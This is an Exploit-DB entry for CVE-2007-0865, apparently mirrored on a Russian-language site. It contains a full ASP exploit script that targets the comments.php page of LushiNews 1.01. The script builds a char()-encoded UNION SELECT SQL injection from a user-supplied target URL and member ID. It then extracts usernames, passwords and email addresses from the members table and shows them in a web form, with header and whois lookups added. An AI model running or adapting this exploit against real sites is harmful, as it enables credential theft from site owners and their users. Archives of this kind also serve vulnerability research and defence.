- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3287
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-0865
- Дата публикации
- 2007-02-08
Код:
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[S.Page : http://www.lushi.de
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
<%
title="LushiNews <= 1.01 (comments.php) Remote SQL Injection Exploit" 'Vuln Title
%>
<html>
<title><% = title %></title>
<head>
<meta name="generator" content="Microsoft FrontPage 5.0">
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit2.asp"><u><% = title %>
</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></p>
</td>
<td width="50%">
<center>
<form method="post" name="form1" action="exploit2.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="10" size="25" style="background-color: #808080">
<input type="submit" value="Get"></form></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
If islem = "hata4" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Just Numeric Character!</font>"
End If
%>
<%
If islem = "get" Then
id= Request.Form("id")
file="comments.php?id="
sql="-1%20union%20select%20concat(char"
sql1="(85,115,101,114,110,97,109,101,58),char(32),"
sql2="Name,char(32),char(80,97,115,115,119,111,114,"
sql3="100,58),Passwort),0,0,0,concat(c"
sql4="har(109,109,97,105,108,58),mail)%20from%20"
sql5="members%20where%20ID="
sql6=id
idform = Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
IF Not IsNumeric(idform) Then
Response.Redirect("exploit2.asp?islem=hata4")
Else
%>
<%
target1 = targettext+file+sql+sql1+sql2+sql3+sql4+sql5+sql6
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
Dim metin
metin = take(target1)
Dim objReg
Set objReg = New RegExp
objReg.Global = False
objReg.IgnoreCase = True
objReg.Pattern = "Username: [A-Za-z0-9ý]+ Pass"
Dim calistir, istediginString
Set calistir = objReg.Execute(metin)
If calistir.Count = 0 Then
Response.write "Not True"
Else
basusername = Replace(calistir.Item(0), "Username: " , "" )
basusername = Replace(basusername, " Pass" , "" )
objReg.Pattern = "Password:[A-Za-z0-9ý]+</b>"
Set calistir = objReg.Execute(metin)
baspassword = Replace(calistir.Item(0), "Password:" , "" )
baspassword = Replace(baspassword, "</b>" , "" )
objReg.Pattern = "mmail:[A-Za-z0-9@.]+</b>"
Set calistir = objReg.Execute(metin)
basemail = Replace(calistir.Item(0), "mmail:" , "" )
basemail = Replace(basemail, "</b>" , "" )
End If
Set bulunanlar = Nothing
Set objReg = Nothing
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">Username:</font></b></td>
<td width="80%">
<b><font color="#C0C0C0" size="2" face="Verdana"><%=basusername%></b></font></p>
</td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">Password:</font></b></td>
<td width="80%">
<b><font color="#C0C0C0" size="2" face="Verdana"><%=baspassword%></b></font></p>
</td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<b><font size="2" face="Arial">Email:</font></b></td>
<td width="80%">
<b><font color="#C0C0C0" size="2" face="Verdana"><%=basemail%></b></font></p>
</td>
</tr>
</table>
</center>
<br>
<%
hedef = targettext
Dim objem
Set objem = Server.CreateObject("MSXML2.ServerXMLHTTP")
objem.Open "GET" , hedef , false
objem.sEnd
strHTML = objem.ResponseText
header=objem.getallResponseheaders()
Response.Write "<center>"
Response.Write "<b>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">Header Bilgileri</font></p>"
Response.Write "</b>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2"">" & header & "</font></p>"
Response.Write "<p><font color=""#008000"" face=""Verdana"" size=""2""><b>Whois</b></font></p>"
Response.Write "<p><font size=""2"" color=""#008000"">Site:</font><font color=""#008000"" size=""1"">[google.com]</font></p>"
Response.Write "</center>"
Set objem=Nothing
%>
<center><form method="post" name="form2" action="exploit2.asp?islem=whois">
<p>
<input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000">
<input type="submit" value="Yolla" name="B1"></p>
</form></center>
<br>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="sdfsd">
</form>
<script language="JavaScript">
write()
functionControl1()
</script>
</b></font>
</body>
</html>
<%
End If
End If
End If
End If
End If
%>
<%
If islem = "whois" Then
site = Request.Form("whoissite")
target1 = "http://reports.internic.net/cgi/whois?whois_nic=" & site & "&type=domain"
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
Set objtake = Nothing
End Function
remoteadres=take(target1)
dim baslangic , bitis
baslangic = "<pre>"
bitis = "</pre>"
dim x , abc
x = 0
abc = 0
dim sonuc
sonuc = ""
Do Until abc = 2
x = x + 1
If Mid(remoteadres,x,Len(bitis)) = bitis and abc = 1 Then
abc = abc + 1
End If
If Mid(remoteadres,x,Len(baslangic)) = baslangic Then
abc = abc + 1
Else
If abc = 1 Then
sonuc = sonuc + Mid(remoteadres,x,1)
End If
End If
Loop
Set objtake=Nothing
%>
<center>
<b><font color="#008000" face="Verdana" size="2">Whois Bilgileri</font></b><p>
<textarea rows="20" name="S1" cols="68" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dotted #008000; background-color: #000000">
<% Response.Write "<" & sonuc %>
</textarea>
</p>
</center>
<center><form method="post" name="form2" action="exploit2.asp?islem=whois">
<p>
<input type="text" name="whoissite" size="20" value="domainwhois" style="font-family: Verdana; font-size: 10pt; color: #008000; border: 1px dashed #008000; background-color: #000000">
<input type="submit" value="Yolla" name="B1"></p>
</form></center>
<%
End If
%>
<%
Response.Write "<br>"
Response.Write "<center>"
Response.Write "<pre class=""info"">"
Response.Write "<font color=""#C0C0C0"" size=""1"">"
Response.Write "En iyi "
Response.Write "</font>"
Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">"
Response.Write "1152x864 "
Response.Write "</span></font>"
Response.Write "<font color=""#C0C0C0"" size=""1"">çözünürlük ve "
Response.Write "<span class=""info2""><font size=""1"" color=""#808080"">Firefox </font></span>"
Response.Write "ile görüntülünebilir.</font></pre>"
Response.Write "<pre class=""info"">"
Response.Write "<font color=""#C0C0C0"" size=""1"">"
Response.Write "Exploit coded by "
Response.Write "</font>"
Response.Write "<font size=""1"" color=""#808080""><span class=""info2"">"
Response.Write "ajann"
Response.Write "</span></font>"
Response.Write "</center>"
%>
# milw0rm.com [2007-02-08]
- Источник
- www.exploit-db.com